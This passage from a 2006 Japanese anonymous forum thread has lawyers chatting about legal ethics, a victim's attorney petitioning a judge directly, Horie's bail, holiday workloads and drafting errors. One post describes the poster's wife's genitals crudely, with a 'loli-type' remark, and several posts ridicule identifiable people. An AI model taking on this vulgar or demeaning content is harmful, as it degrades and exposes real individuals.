弁護士から見ても,弁護士のくずがいちばん出来が良い。
マチベンの実態にも忠実。用語の間違いも見あたらない。
おもしろいよ。

839 :TN:2006/04/23(日) 17:30:41 ID:Aj01p/ED
ちなみにマチベンの脚本家は白い巨塔の人らしい

840 :TN:2006/04/23(日) 19:19:09 ID:Aj01p/ED
>>835で間違ったこと書いてたので訂正

公務員として職務上取り扱つた事件は弁護士が仕事にできないからやはり懲戒事由になりそう
でもそうすると竜雷太の件はどうなるんだろう
この流れで行くと弁護士として再審請求かなんかしそうなんだが

841 :無責任な名無しさん:2006/04/23(日) 19:45:43 ID:mZ7swips
>>840
なんの冤罪事件か忘れたが、再審請求を扱った裁判官が、退職後、弁護士として活動して
冤罪をかちとった事があったと思う。


842 :TN:2006/04/23(日) 19:49:58 ID:Aj01p/ED
でも弁護士法25条にははっきりそう書いてあるんだよね。
どうなんだろうね。

843 :無責任な名無しさん:2006/04/24(月) 08:24:16 ID:w5K0NLBN
当職の土曜日の出来事

すごく昔にたまたま大学が同じということで付き合いが始まった大先輩から大きな封筒が届く。

さらに中を見ると手紙が・・・・・。

「三男が政治家になりたがっているのでボランティアをお願いしたい。
三男が政治家になりたがっているので政治団体に入会していただきたい。年2000円です。
三男が政治家になりたがっているので当該選挙区の有権者を紹介していただきたい。」

なるほど。
三男の笑顔のポスターも入っている。
確か、三男は司法浪人をしていたはずだが方向転換したのか。もう、30代中〜後半のはずだが。

政治信条は?

「武士道精神に基づく政治を実行します。」

不始末で上司が部下に切腹を命じるのを不可罰にするとか?
潔い散り際?が武士道なら選挙に落ちたらすっきり政治家を諦めるのだろうか?
武士道と言われてもよーわからん。

・・・・・そっと内容物を封筒に戻し、何事もなかったかのように古紙置き場へ。


844 :無責任な名無しさん:2006/04/24(月) 10:01:22 ID:3wD7Wa/8
後もう少しでGWだから,それまでがんばろう。
GWに入ったら,最初の一日だけよく寝て,あとはたまった仕事を全部片付けるんだ!

845 :無責任な名無しさん:2006/04/24(月) 10:37:59 ID:sWVxFrCz
おれはGWまでにはたまった仕事を片づけられるよう、それが無理でも
最初の一日だけは仕事に回してでもなんとか片づけられるようがんばろう。
あとはゆっくり休んだり、家族と遊びに行くんだ!

846 :無責任な名無しさん:2006/04/24(月) 11:34:54 ID:UwaCjKsm
GW明け締切りの書面ばかりあり,
GW中盤の日に当番の俺はどうすればいいですか?


847 :無責任な名無しさん:2006/04/24(月) 12:00:32 ID:SVG2dbJ1
>>841
徳島ラジオ商事件だったと思う。
担当部配属になって寝かされてた再審請求関係の記録を読んで
これは冤罪だと確信した、裁判官辞めて弁護人として尽力した
みたいな話でしたね。

848 :無責任な名無しさん:2006/04/24(月) 12:11:37 ID:QXwJD/vF
>>847
財田川事件じゃなかったっけ?
うろ覚えだけど

849 :無責任な名無しさん:2006/04/24(月) 12:52:13 ID:FFnXJiAg
848さんが正解です。

自分が関与して無罪の意見が入れられなかったので、退官して弁護にあたったという、まさに問題事案でした。
しかし、この方の正義感と執念とで、再審無罪に結果となったので、誰も問題とはしない。


850 :無責任な名無しさん:2006/04/24(月) 12:54:36 ID:pUAa3cow
GWは俺にとってはたまった案件を片づけるありがたい期間
妻にとっては家族で過ごせると考えている休暇期間


851 :無責任な名無しさん:2006/04/24(月) 13:09:25 ID:pUAa3cow
>>843
古紙置き場から取り出してよく読め。ちゃんと書いてある。
昭和45年生まれ35才と書いてある。
平成11年9月(何故9月?)に早稲田卒業とあるから、29才で大学卒業ということになる。
職歴は卒業から2年経とうとする平成13年7月から親の法律事務所の事務員、昨年事務長に就任。
平成13年から平成17年の間に不動産会社の非常勤を経てとあるが、よく分からない。

それと、お願い事項は、スローガンを考えて欲しい、というのもある。
パンフ曰く、今考えているのは「人を切ります、切られます、主君、中野区民のためならば。」だがもっといいのがあれば出してくれと。
非常に面白い。捨てるには惜しい。同僚や事務員にも見せてからにしないと。




852 :無責任な名無しさん:2006/04/24(月) 14:45:28 ID:NAkrqx6l
>>851
早稲田の場合、法職課程教室に入ってれば卒業後も学内の施設使えるから、
留年して司法浪人続けるメリットはあまりないんだけどなあ。なんで、29歳まで留年したんだろ?
早稲田は8年経っても卒業できなければ除籍だから、おそらく途中で休学もしてると思われるな。
休学期間中は、カウントされないはずだから。


853 :無責任な名無しさん:2006/04/24(月) 14:58:59 ID:3wD7Wa/8
>>846
当番の件数が少ないことを祈りましょう。

854 :無責任な名無しさん:2006/04/24(月) 15:03:31 ID:3wD7Wa/8
http://courtdomino2.courts.go.jp/kshanrei.nsf/0/6c969fa677c6eebc49256d2700338cc6?OpenDocument

855 :無責任な名無しさん:2006/04/24(月) 16:37:15 ID:pUAa3cow
>>852
日大法学部とと中大法学部を経てとあるから、留年ではなさそう。
しかし、卒業の月が9月であることや、全て卒業の場合はすくなくとも30才になっていなければならないので整合性がない。
仮面浪人をしたのかもしれないが、謎は大きい。

856 :無責任な名無しさん:2006/04/24(月) 19:40:36 ID:wL4uEY7y
>>855
前期のみの講義で卒業単位に達したら、そこで卒業になるんじゃないかな?

857 :無責任な名無しさん:2006/04/24(月) 21:29:28 ID:OVbRCeMv
ジャンケン候補に入れてやったのに落選しよって・・・

858 :無責任な名無しさん:2006/04/24(月) 22:14:47 ID:WbMBkX7M
妻のおまこは形がいい。やはり30歳を過ぎると色素沈着してきて20代の時よりは
熟してきている。ロリ系の私は少し不満なのだが、それはお互いさま。
色は妊娠中がピンク色してて、一番よかったな。
いまでも形は、ひよりちゃん。
妻曰く、「デジカメ買っても私の顔は撮影してくれない」
顔もかわいいけど、やっぱりね。



859 :無責任な名無しさん:2006/04/24(月) 23:49:24 ID:jslSJn/m
なんだこれ。あんた弁護士?

860 :無責任な名無しさん:2006/04/25(火) 01:34:42 ID:KpZwhU12
みなさん、車は何に乗ってます?
僕はCMに感化されて、マークXを買うことにしますた。
ちなみに、20代後半独身です。

861 :無責任な名無しさん:2006/04/25(火) 01:44:52 ID:vCoTEpVO
ウインダムモデルの自転車w

862 :無責任な名無しさん:2006/04/25(火) 02:13:42 ID:h39f4PXP
>>860
うちの事務所のカーライフ

ボス(50後半) 車なし
兄弁(30後半) ヴィッツ
俺(30前半) スイフト

地味だな。



863 :無責任な名無しさん:2006/04/25(火) 03:52:51 ID:dndvAMfG
フィット

以前はでかい車に1人で乗ってたけど,
意味がないことに気づいたので,今はコンパクト。
GSに行くことを忘れるくらい燃費がいい。

864 :無責任な名無しさん:2006/04/25(火) 05:53:09 ID:Lnc0mo21
カローラフィールダー

子供が出来てベビーカーを積むとなると、荷室が広い方が便利。
あとは燃費との相談だった・・・何となくorz

865 :無責任な名無しさん:2006/04/25(火) 07:03:50 ID:64hRcCas
インプレッサWRX

燃費悪い。ちょっとだけ早い。
略式裁判の日には,裁判所の駐車場でよく見かける。

866 :無責任な名無しさん:2006/04/25(火) 09:58:16 ID:xqLEcYbg
ホンダ ステップワゴン シルバー

岐阜県警の押送用車両と同じ。
地検・地裁の駐車場では「警察車両」のスペースに置いて良し。


867 :無責任な名無しさん:2006/04/25(火) 12:47:59 ID:DlWBaFjc
>866
岐阜県弁護士会って100人しかいないみたいだけど、ここに書き込んでること
特定されるようなこと書いて大丈夫かw

868 :行き詰まり弁護士 ◆BAKA/8y6zk :2006/04/25(火) 18:11:04 ID:N/cBAtKo
ATOKで「ぐぐる」を変換したらググると出た。

869 :無責任な名無しさん:2006/04/25(火) 18:26:26 ID:kA9xZwc/
http://www.sunmarie-b.jp/cgi-pl/renai/msn_renai.cgi?no=508

誰なのか気になってしまう・・・。

870 :無責任な名無しさん:2006/04/25(火) 18:43:07 ID:WHbVefYg
>>869
ネタだろ?

871 :無責任な名無しさん:2006/04/25(火) 19:25:15 ID:Us46WBPS
産科・小児科医療崩壊は医療訴訟が原因Part2
http://academy4.2ch.net/test/read.cgi/jurisp/1145928809/

1 名前:法の下の名無し[sage] 投稿日:2006/04/25(火) 10:33:29 ID:iQSLnLwx
産科・小児科医療がが全国で崩壊の危機に瀕しています。
診療報酬が少ない、激務であることも事実です
しかし産科・小児科医師の志望者が激減している理由はそれだけでは
ありません。医療訴訟によって今まで吸っていた甘い汁が吸えなくなった
事が真の原因です。産科・小児科医療が崩壊すれば、誰が子供を産
もうとするでしょうか。少子化はさらに加速し日本は本当に滅びるでしょう。
善意で産科・小児科を目指す若者を育て、金目当ての守銭奴医者を
どうしたら排除できるのか。そのための法制度はいかに築いていくべきな
のか?
法律家としての議論・提言をお願いします。

お約束
法律家に対して便汚士、放屁、法匪、などと蔑む医者が大量にいますが、
そのような職種なので哀れみながらスルーしましょう。
ときどきまともな人が出てきますのでその人へは冷静な対応をお願いします。
都合が悪くなったらスルーする人もスルー。

前スレ
産科・小児科医療崩壊は医療訴訟が原因
http://academy4.2ch.net/test/read.cgi/jurisp/1139405334/

2 名前:法の下の名無し[sage] 投稿日:2006/04/25(火) 11:41:33 ID:sOc3dPDD
新スレ立ったんで一つ頼みたいんだが、
裁判所サイトで医師の目線から見ておかしいとされる判決を何個かPick Upしてくれないかい?
当方法学側なのでよくわからんのですよ

872 :無責任な名無しさん:2006/04/25(火) 19:42:54 ID:Auc7cM1u
ttp://www.kamo-law.com/tangan.htm
厳刑嘆願書を,検察官だけじゃなくて,裁判官に勝手に送りつけて
平気な弁護士(被害者代理人)って...。
しかも書記官が「裁判官が目を通してる」って...。


873 :無責任な名無しさん:2006/04/25(火) 20:15:49 ID:Lnc0mo21
まあ、いつの事件か知らないが、いまなら被害者の意見陳述(またはそれに代わる書面)が
可能だからそっちに行くのだろうな。

厳罰嘆願書は、他の事件でも見たことがあるがw

874 :無責任な名無しさん:2006/04/25(火) 20:29:24 ID:glfWJGBJ
 被害者側代理人ならいいんじゃないかなぁ。
 読む読まないは裁判官の判断だしね。それに建前上は、適法な証拠調べを経ていないものは、判決に当たって斟酌しなければいいわけだし。


875 :無責任な名無しさん:2006/04/25(火) 20:29:47 ID:igqO9W0E
http://www.kamo-law.com/tv.htm
ボクシングをしたら話題になりそうだ。

このひと,刑事事件をやらないんじゃないか?>>872

876 :無責任な名無しさん:2006/04/25(火) 20:32:23 ID:c4NnkWcY
マスコミ御用達のBにロクなヤツはいないよな。
事件で相手方になると実感する。

877 :無責任な名無しさん:2006/04/25(火) 20:32:28 ID:igqO9W0E
>>874

> 裁判所の書記官からも電話が入った。

>「被害者の方の嘆願書は、今日受けとりました。いま裁判官が目を通していますよ」

> これでもう、ぼくの目的は達成されたも同然である。ミノルに、刑の執行猶予がつかないのは
>ほぼ間違いない。それどころか、8ヶ月ですむ懲役が1年にのびるかもしれない。


878 :無責任な名無しさん:2006/04/25(火) 20:32:54 ID:YTyKca7q
>>872
やり方はどうかと思うが,この被害者はカワイソス
読んでて涙した。


879 :無責任な名無しさん:2006/04/25(火) 20:44:46 ID:pk8nJjsd
地方で厳罰嘆願書を代理人として作成したら報復が怖そう

880 :874:2006/04/25(火) 20:57:28 ID:glfWJGBJ
>877
 なぜに貼られるのかが理解できないが・・・

 同じ裁判官が、共犯事件について、一方は公訴事実を認めて証拠も全部同意したので有罪とし、他方は、否認し証拠も不同意にして、
尋問等を行った結果、無罪判決を書くこともあって当然なわけで、読んでも適法な証拠調べ経ていなければ、斟酌しなければよいという建前のはずだし、
それができない裁判官とも思えないが(但し、検察官に電話して、被害者の処罰感情を法廷に出すよう仕向ける可能性はあるが。)。

 これで執行猶予をつぶせたというのは、被害者代理人の一方的な推測に過ぎないし。

881 :無責任な名無しさん:2006/04/25(火) 21:18:40 ID:uLOdkbnU
>>872
保険会社ついてるんだろ。
保険会社が冷淡だったって加害者には関係ないだろ。
加害者の悪性格の立証って民事で何やってんだ?
婚約中なのに二股かけたことが交通事故と因果関係があるのか?
C型肝炎は事故の加害者の責任なのか?病院は訴えたのか?
そもそもこの程度の訴訟で8年も9年もかかったのか?

ツッコミどころ満載ですな。

882 :無責任な名無しさん:2006/04/25(火) 21:23:16 ID:uLOdkbnU
>>880
ツッコミどころを貼り直しただけじゃないか。
>>877はこの人刑事事件やらないんじゃないかの人だし。

883 :無責任な名無しさん:2006/04/25(火) 21:51:17 ID:sqaaelqv
週刊誌の記事みたいな文章が気持ち悪い。この人、こんな準備書面書くんだろうか。

この人、地方の裁判所は弁護士同士のなれ合いばかりと書いて、謝罪させられたか
なんかした人だね。

884 :無責任な名無しさん:2006/04/25(火) 22:15:59 ID:FFEDvScm
疲れたなー。
別組織の人たちは去年の4月辺りの会議から
お給料や年金関係のことで上司さんたちと話し合いを続けて
気がつけばもう1年経つわけだけど、まだ10年以上勤続の人の
お給料の上がり方についてのところは合意に至らず、話し合いが続いてるみたいー。
素晴らしいことだとは思うけど。
大変ですね。

885 :無責任な名無しさん:2006/04/25(火) 22:17:57 ID:igqO9W0E
弁護士同士でさえ信用できないような東京よりは,地方のほうが健全だな〜。

886 :無責任な名無しさん:2006/04/25(火) 22:19:46 ID:FFEDvScm
884は間違いました。すみません。

887 :無責任な名無しさん:2006/04/25(火) 22:26:01 ID:tPCk5i2V
http://www.zakzak.co.jp/top/2006_04/t2006042503.html

http://www.zakzak.co.jp/top/2006_04/t2006042507.html

ネタ投下

888 :無責任な名無しさん:2006/04/25(火) 22:29:34 ID:e6kDTH+W
70歳女性弁護士書類送検…飼い犬に狂犬病注射せず

 12匹の飼い犬に狂犬病の予防接種を受けさせなかったとして、奈良西署は24日までに、狂犬病予防法と県動物愛護管理条例違反の疑いで奈良市の女性弁護士(70)を書類送検した。

 調べでは、女性は自宅で飼っている犬に、予防接種を受けさせていなかったほか、犬が人をかんだことを奈良市保健所に届けなかった疑い。

 近所の人の話では、女性は約10年前から犬を飼い始め、約20匹が敷地内に放し飼いにされていた。逃げ出した犬が近所の人や小学生にかみついたり、夜中にほえ続けるなど近所とのトラブルもあったという。

 苦情を受けた奈良市保健所が奈良西署に告発していた。(共同)

ZAKZAK 2006/04/25

889 :無責任な名無しさん:2006/04/25(火) 22:38:27 ID:Hfn9E3fV
もうすぐGWですなあ。
何日仕事せずに過ごせるか・・・

890 :無責任な名無しさん:2006/04/25(火) 23:41:56 ID:/aka15CM
>>872
勘違いしていませんか?
全く問題ないですよ。

891 :無責任な名無しさん:2006/04/25(火) 23:50:04 ID:snNYcVbL
http://www.kyoto-np.co.jp/article.php?mid=P2006042500036&genre=C1&area=K1D

路駐か? それにしてもやった方もアレだな…。

892 :無責任な名無しさん:2006/04/26(水) 00:24:20 ID:SV0kBviG
>>889
 GWは事務員もいないし,電話も留守電にする。妻子は遠方に旅行に行っている。この合間にたまっている仕事をやるべし。

893 :無責任な名無しさん:2006/04/26(水) 00:29:13 ID:SV0kBviG
 ところで法律事務所から日々発生している産業廃棄物(シュレッダーに
掛けた書き損じ準備書面や刑事弁護記録)は貴事務所ではどのように処理
しているのだろうか?
 当事務所は,マンション管理組合から「シュレッダーゴミをマンションの
ゴミ箱に捨てないでくれ」といわれ,サンタクロースが担ぐくらいのシュレッ
ダーゴミが30袋ぐらいたまっている。これを処分する秘策を見つけた。

894 :無責任な名無しさん:2006/04/26(水) 00:35:36 ID:SV0kBviG
 最近少年事件(警察署に勾留中)の弁護士(おそらく委員会派遣)がべらべらと「ぶら下がりインタビュー」に応じている(けっこう年
配の先生)が,あれは良いのだろうか?
 「否認」にしても「自白」にしても(当番弁護士を通じた)被疑者伝聞証拠は,べたべたに証拠能力がある。

 ロペス・ヤギでベラベラベラベラ喋りまくった挙げ句,勾留理由開示した弁護士(たぶん委員会派遣)はどうなったのだ?

895 :無責任な名無しさん:2006/04/26(水) 00:38:51 ID:81jm6xRt
どうしてホリエモンの保釈が認められるのだ?


896 :無責任な名無しさん:2006/04/26(水) 00:43:04 ID:33UWvqci
もうすぐドザエモンだからw

897 :無責任な名無しさん:2006/04/26(水) 07:40:03 ID:IdWn4crS
保釈になったの?しらなかった。

広島の彼については刑事弁護MLで本人が弁解していた。
日本語能力が乏しく、また、警察側からおかしなリークがあるので、こちらからも早めに言い分を表に出す必要があったとかいっていたような。

>>893
うちは、普通に古紙ゴミで出しています。
名前の載っている1枚目だけシュレッダーにしています。

898 :行き詰まり弁護士 ◆BAKA/8y6zk :2006/04/26(水) 08:08:33 ID:fjJk0OLI
>>897先生
まだ保釈は保留になったままのようです。

http://www.asahi.com/national/update/0425/TKY200604250201.html

899 :無責任な名無しさん:2006/04/26(水) 09:38:18 ID:Ed5VU6UQ
>>893
シュレッダーにかけて事業廃棄物として処分(有料)

>>894
季刊刑事弁護最新号参照

900 :無責任な名無しさん:2006/04/26(水) 10:33:34 ID:cMfq8tGP
>>880
刑事裁判の公正さを担保するためには公判廷に出ていない書面を裁判官が読んだらまずいだろ。
たとえ量刑事情として斟酌しないとしてもだ。
どうしても出したいなら担当検察官に送って書証として提出しないと。

901 :874:2006/04/26(水) 11:54:45 ID:oj6KcHHZ
>900
 弁護人として職務を行う場合は、仰るとおりの意見で臨むべきだが、被害者の代理人として職務を行う場合は、
被告人の利益を慮って、読んでくれるかどうかも分からない手紙を裁判官に直接発送することを遠慮しなければならない理由はないように思います。

 裁判官としては、自分宛に来た手紙である以上、読んだら違法ということにはならないように思います。書記官に全て事前に検閲させなければならないということにもならないでしょう。
 読む読まないは、裁判官の判断だと思う。

902 :無責任な名無しさん:2006/04/26(水) 12:18:36 ID:S4wWpfOn
>>901
結果的に裁判官が読んだとしても,それを「裁判官が読んでます」なんて得意げに
自分のサイトに書き散らして鼻高々というのはいかがなものかと思うが。

少なくとも,この人が相手方になったときには,ダーティーな手を使ってくる可能性
もあると警戒せざるを得ない。正本と副本の内容が違うとかね。



903 :無責任な名無しさん:2006/04/26(水) 12:47:49 ID:Ed5VU6UQ
>>901
自らが当事者でないとしても,裁判官に違法な手続をさせて喜ぶ弁護士は,どうかしている。
職務基本規程4条,14条,21条に違反するような気がする。
そして,HPのこの記載は同9条2項(品位を損なう広告の禁止)に抵触するような気がする。


904 :無責任な名無しさん:2006/04/26(水) 12:48:37 ID:Ed5VU6UQ
>>902
>正本と副本の内容が違うとかね。

都会にはそんな弁護士がおるとですか。
おそろしか。

905 :無責任な名無しさん:2006/04/26(水) 12:56:07 ID:sAoeWWtl

囲碁と法律の雑記帳
http://plaza.rakuten.co.jp/igolawfuwari/diary/200604190000

2006年04月19日 死刑囚に慰謝料を支払わされた弁護士
 なぬ?と思われるかもしれないが、実際にそんな事件があった。
東京地判昭和38年11月29日の民事裁判例である。
 死刑囚が弁護士を裁判に訴えたら、勝ったのは死刑囚だったのである。

元検弁護士のつぶやき
http://www.yabelab.net/blog/2006/04/23-121427.php
2006年04月23日 死刑囚から訴えられた弁護士

906 :無責任な名無しさん:2006/04/26(水) 13:32:05 ID:d8h2dPbE
被告人が自分で書いた謝罪文を直接裁判官宛に郵送したことがあったけど、
そのときは裁判所から、「弁護人にお渡ししますので、弁護人から公判で提出してください。」
と言われたなあ。

907 :無責任な名無しさん:2006/04/26(水) 14:57:04 ID:9ET7XmBJ
>>904
俺,昔,訂正が面倒だからって思って捨て印押して訴状出したら,勝手に副本直す人がいたりするから止めた方がよいですよと
地元の書記官に教えてもらったことがある。
地方修習地での就職だと,皆さんが優しくて良いです。

908 :無責任な名無しさん:2006/04/26(水) 16:00:33 ID:dCqVSOwe
>>901
民事での被害者代理人は刑事では第三者だ。
これで量刑が重くなったら弁護人に量刑不当の控訴理由を与えることになる。
被害者の意見を裁判所に伝えるにも方法は選ばないと。

俺的には仕事できない人に認定。


909 :無責任な名無しさん:2006/04/26(水) 18:04:40 ID:9ET7XmBJ
この人は刑訴やってないんじゃないかね

910 :無責任な名無しさん:2006/04/26(水) 18:37:00 ID:AQIkWZG2
司法書士はどうなん?

911 :無責任な名無しさん:2006/04/26(水) 19:19:10 ID:81jm6xRt
堀江が保釈された、どうして?
http://news19.2ch.net/test/read.cgi/newsplus/1146042093/

912 :無責任な名無しさん:2006/04/26(水) 19:35:46 ID:dQGPfUXL
保釈金がたった3億円?

913 :無責任な名無しさん:2006/04/26(水) 19:53:24 ID:DhzmlbcT
貧乏な裁判官の想像力の限界が3億円(年末ジャンボ宝くじ並)なんだろう。
彼の資力からすれば100億ぐらいいってもおかしくないと思ったが。

914 :無責任な名無しさん:2006/04/26(水) 20:57:38 ID:YsOF0HhH
人質司法からの脱却という意味では歓迎すべきことなんだろうけど

かつて自ら取調べをしていたヤメ検弁護士が
調書に署名押印をしないよう指示し、
否認かつ身上調書しかない事案で保釈を勝ち取る、
裁判所は何を考えているんだか・・


915 :無責任な名無しさん:2006/04/26(水) 21:13:15 ID:4uWFQg6J
プレジデント誌で、
弁護士さんの平均年収が2100万とありました。
弁護士さんて、そんなに収入多いのですか。
正直ビックリ。

916 :無責任な名無しさん:2006/04/26(水) 21:50:58 ID:RD4xiDw/
>>915
1億2000万円の人が1人と1000万円の人が9人。

917 :無責任な名無しさん:2006/04/26(水) 21:59:12 ID:k/kKI0Zj
 もしそれが本当に弁護士の平均収入であれば,もう少し頑張って稼ぐと
「長者番付」に出てしまう。
 恐らく「プレジデント」を購読している弁護士にアンケートを採った結
果ではないのか?(アンケートに答えた弁護士が正直に申告しているどう
かは,疑わしい) それにしてもあの種の雑誌購読して面白いのだろうか?
「処世訓」とか「自己啓発」の類だろう?

 税務調査に入られて,がっぽり持って行かれる弁護士は時々いる。2週間ぐ
らい事務所に居座っていてうざい。著名で良識のある税理士(公認会計士)に頼
むと,調査は入らない。

918 :無責任な名無しさん:2006/04/26(水) 22:01:08 ID:k/kKI0Zj
 パートナー弁護士の提案で「花見お食事会」やったけど,事務員
さんが当職に対して,「花見お食事会は今年限りで廃止と提案して
ください」と言われた。

919 :無責任な名無しさん:2006/04/26(水) 22:02:15 ID:k/kKI0Zj
 保釈金代用証券は,ライブドア株だったりして(あり得ないけど)。

920 :無責任な名無しさん:2006/04/26(水) 22:04:38 ID:7mmagAZZ
>>915
売り上げなら少なすぎ,課税所得ならちと多い,ていうところかな

921 :無責任な名無しさん:2006/04/26(水) 22:53:05 ID:E9snqsLZ
キムラ建設の篠塚って,どうしてフジとテレ朝に対する態度があんなに違うの?テレ朝となんか具体的な衝突があった?

922 :無責任な名無しさん:2006/04/26(水) 23:06:10 ID:GZ9vRwzU
>>921
記者の個性の問題だと思う。
マスコミ対応してても,話してあげたくなる記者と,話すのも嫌になる記者がいる。

篠塚さんも,弁解を聞こうとする記者には態度よく接するでしょう。
テレ朝のアレは,キレさせようとして意地悪な質問ばかりしてたから,あんな態度されて当たり前。
ていうか,テレ朝記者の術中にはまって,撮ろうとした画を提供しちゃっただけだけど。

923 :無責任な名無しさん:2006/04/27(木) 00:08:38 ID:5ZWmC/If
>>843
>>851
>>852
>>855

さらに悪徳弁護士スレより
> 540 名前: 内○大三郎を励ます会 [sage] 投稿日: 2006/04/25(火) 17:45:09 ID:HYrdTogT
> 日時:平成18年5月19日午後6時〜
> 場所:中野サンプラザ
> 会費:1万円(事前送金も可)
> それでも活動資金が不足します。
> パーティ券は、1枚でも2枚でも追加購入して下されば幸いです。
> うちにはこんなのも来ました。
> 私は存じ上げませんが号令かければ国民が万札片手に駆けつけるようなエライ方なのでしょうか?


俺のところにもきた。俺も一言言いたかった。仲間に入れてくれ。
本当に信じられない。
信じられない。
厚顔無恥。
厚顔無知。
紅顔無知。
童顔無知。


924 :無責任な名無しさん:2006/04/27(木) 09:28:19 ID:wLQCvuwq
>>920
売上2100万じゃ少なすぎですか……。

925 :無責任な名無しさん:2006/04/27(木) 10:17:19 ID:1EfKeYmy
少なすぎということもないだろうけど,
事務員1人を雇うのがやっとでしょうね。

926 :無責任な名無しさん:2006/04/27(木) 12:48:02 ID:kjM2lQV2
>>923
俺はつきあいのない人なので、誰のことを言っているのか判らなかったが、
一部伏字にしてあるけど、その名前で特定できてしまった。
ホームページのえらそうな文章を見て何となく納得。

まあ貴方は読んだ人が特定しうることを判った上でコピペしたんだろうけど。


927 :TN:2006/04/27(木) 17:21:35 ID:RzIg39xd
5月8日提出期限の民事控訴趣意書が今完成した
これでGWが気分的に楽
ちょっといい気分

928 :無責任な名無しさん:2006/04/27(木) 17:43:52 ID:/a+kxKWm
>>927
乙。
俺はGW前の大山場の集中証拠調べがさっき終わり何となく和解成立。
それなりに悪くない和解なので依頼者も喜んでいた。

すっきりした気分もそこそこに明日提出の準備書面の起案にかかる。

929 :無責任な名無しさん:2006/04/27(木) 19:25:47 ID:7S0hVGYq
皆さん,5月1,2日はどうします?
私は両日ともしっかり仕事が入ってます,,,

930 :無責任な名無しさん:2006/04/27(木) 19:29:38 ID:iEqV9BMT
>>927
民事は控訴理由書ですよ〜。
あまり気にしない人が多いけど。

931 :無責任な名無しさん:2006/04/27(木) 19:43:12 ID:+HzVo6I5
>>929
事務所はカレンダーどおり。
自分はいつもと同じように土日祝関係なく仕事です。
・・・・ふう

932 :無責任な名無しさん:2006/04/27(木) 21:02:56 ID:9p7m5Cmq
>>929
少年審判の期日が2日に入っています。


933 :無責任な名無しさん:2006/04/27(木) 21:47:29 ID:TvVuIOMV
産科・小児科医療崩壊は医療訴訟が原因Part2
http://academy4.2ch.net/test/read.cgi/jurisp/1145928809/

53 名前:疑問[] 投稿日:2006/04/27(木) 17:27:48 ID:CEI4W4GG
先日弁護士の方が書いた医療訴訟の本を読んだのですが、
「医師はミスを隠す」「医師には良心がない」いうのが大前提で閉口したおぼえがあります。

医療訴訟専門の弁護士さんのようでしたが、
その方でさえ、医師の仕事をまったく理解していないようでした。

過去の医療訴訟のなかにはとんでもない医師が起こしたものがあるのかもしれませんが、
現在ほとんどの医師は良心をもって医療をおこなっています。

私は弁護士は物事をきちんと見分ける能力にたけており、
全てを公平に観察し、先入観がないものだとおもっていましたし、
医療事故と医療ミスを見分ける能力があると信じていました。
尊敬していました。

しかし、前提からそれが覆されショックを受けています。

善良な医師がやる気をなくす世の中をなくすよう、
公平な目線を持ってもらいたいと思います。

934 :無責任な名無しさん:2006/04/27(木) 22:30:15 ID:GXesrSq3
石ウザイ


935 :無責任な名無しさん:2006/04/27(木) 23:18:27 ID:Wi6b7gRZ
>>927
 漏れは,刑事事件で「控訴理由書」を提出した。(S・Yさん)。<控訴の趣意は,「控訴理由書」と題する書面の通りだね。表題が間違っているから,決定で控訴棄却しようと思ったけど,まぁ,良いよ。>と思いっきりセキョーされた。
 そのうえ,判決謄本を取り寄せてみたら,<本件控訴の趣意は弁護人作成の<「控訴理由書」と題する書面>記載のとおりであり,要するに・・・・。(訴訟手続の法令違反)論旨には理由がない。論旨には理由がない。(量刑不当)論旨には理由がある。>との記載があった。
 S・Yさんは,「論旨には理由がない」と朗読するたびにちょっと険しい視線で弁護人を見るので,怖い。

936 :無責任な名無しさん:2006/04/27(木) 23:59:37 ID:kkdC3xbU
>935
いやらしいね。いやみったらしい。

937 :無責任な名無しさん:2006/04/28(金) 00:08:55 ID:JoB60uLO
>>935
その前に刑訴法の「第三篇上訴第二章控訴」くらい嫁
弁護士として金もらって仕事してるなら基本的法律用語間違えるのは恥だよ

938 :929:2006/04/28(金) 00:25:48 ID:iALy0Z5B
>>931
>>932
ここ休めると楽なんですけどね。
お互い頑張りましょう。

939 :無責任な名無しさん:2006/04/28(金) 00:34:59 ID:FBopxvDQ
登録して2年くらいまでは弁護人と代理人間違えてた。

940 :無責任な名無しさん:2006/04/28(金) 00:52:33 ID:JoB60uLO
50歳の弁護士が告訴状に「○○告訴請求事件」と「事件名」を明記して,肝心の告訴事実がスッポリ抜けて,告訴の趣旨欄と告訴の理由欄しかなかった。
指導検事がのけぞって,それを見た修習生が全員大爆笑。
地方ではこんな弁護士も副会長になれるんだなーとあきれ果てた検察修習。

若いときの間違いはいいと思うよ。直せば(漏れも人のこと言えない)。
だけど50歳でやったら,ただのアホ弁護士とさげすまれるYO。

941 :無責任な名無しさん:2006/04/28(金) 00:55:03 ID:nZ6hBLIV
>>935
 弁護士は,実は法律用語を結構間違える。一番間違うのは,原告と被告との取り違えである(表示の錯誤?)。依頼者の方に分があると,つい被告を原告と表記してしまう。
 控訴事件だが,量刑不当に「論旨には理由がある」で量刑を負けてくれたうえに,控訴審未決勾留は全部算入で,依頼者は喜んでいたので結果オーライ。
 「○○刑務所に入れてくれ」とか「刑期の3分の1」のころを手帳に記載し,「○○君仮釈申請」というところまでサービスできる弁護人はどれくらいいるのかな? まぁ,用語のミスには気をつけようとは思っているけどね。

 ところで,用語のミスや,交通事故訴状の計算チェックは,事務員さんやってくれる?

942 :無責任な名無しさん:2006/04/28(金) 01:24:41 ID:87zUq4ry
今でも赤面するのは,登録して5日目くらいのとき。
保全事件で担保積んで決定正本もらいに行って,書記官から「先生,受書あり
ますか?」と聞かれたとき。
「受書って何ですか。」って訊いたら,書記官が一瞬絶句して「先生
受書知らないですか?」って聞き返された。

弁護修習で,事務的なことを全然見てなかったから。


943 :無責任な名無しさん:2006/04/28(金) 01:36:11 ID:nZ6hBLIV
 ライブドア関係の訴訟が一部盛り上がっているが,誰かホリエモンの保釈保証金返還請求権(厳密に言うとホリエモンが保釈金を積んだ弁護士に対して有している寄託金返還請求権)を仮差しないのだろうか? 
 これだけおいしくて確実な責任財産はないと思うのだけどね。
 

944 :無責任な名無しさん:2006/04/28(金) 01:45:45 ID:nZ6hBLIV
>>942
 弁護士登録5日後に保全事件を遂行したのか? 皮肉でもお世辞でもなく,大したものですよ。
私は事務的なこと(訴額の算定・管轄裁判所が間違ってないか・もちろん受書の提出や,書面提出のファ
ックス表書き等)は事務員さんに任せている。登録5日目だと,受書みたいな事務的なことは分からない
のは当然であって,別に赤面することはないと思う。ただ,書記官に聞くのは,ちょっちまずい。事務員さんに貴家。

945 :無責任な名無しさん:2006/04/28(金) 04:23:14 ID:YV+LwWTw
>>943
そもそもホリエモンについて保全の必要性があるのかね。
彼の資力を知っているわけではないが、損害賠償全部払ってもお釣りが来るなら
保全の必要性はないわけで・・・

